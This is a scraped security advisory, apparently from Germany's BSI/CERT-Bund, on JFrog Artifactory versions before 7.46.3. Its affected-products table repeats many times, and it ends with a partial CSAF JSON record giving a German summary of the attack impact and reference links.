JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
JFrog Artifactory
JFrog / Artifactory
|
cpe:/a:jfrog:artifactory:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
JFrog Artifactory <7.46.3
JFrog / Artifactory
|
<7.46.3 |
References
8 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "JFrog Artifactory ist eine universelle DevOps-L\u00f6sung.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in JFrog Artifactory ausnutzen, um seine Privilegien zu erweitern, beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen und einen Denial-of-Service-Zustand auszul\u00f6sen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2022-1375 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1375.json"
},
{
"category": "self",
"summary": "WID-SEC-2022-1375 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1375"
},
{
"category": "external",
"summary": "JFrog Fixed Security Vulnerabilities vom 2022-09-11",
"url": "https://www.jfrog.com/confluence/display/JFROG/Fixed+Security+Vulnerabilities"
},
{
"category": "external",
"summary": "JFrog Fixed Security Vulnerabilities",
"url": "https://www.jfrog.com/confluence/display/JFROG/Fixed+Security+Vulnerabilities"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2022:6782 vom 2022-10-04",
"url": "https://access.redhat.com/errata/RHSA-2022:6782"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-5776-1 vom 2022-12-13",
"url": "https://ubuntu.com/security/notices/USN-5776-1"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2023:5165 vom 2023-09-14",
"url": "https://access.redhat.com/errata/RHSA-2023:5165"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:03545-1 vom 2025-10-13",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UB7MGNRMXC5LO5Y66FLOE354VVU5ULQK/"
}
],
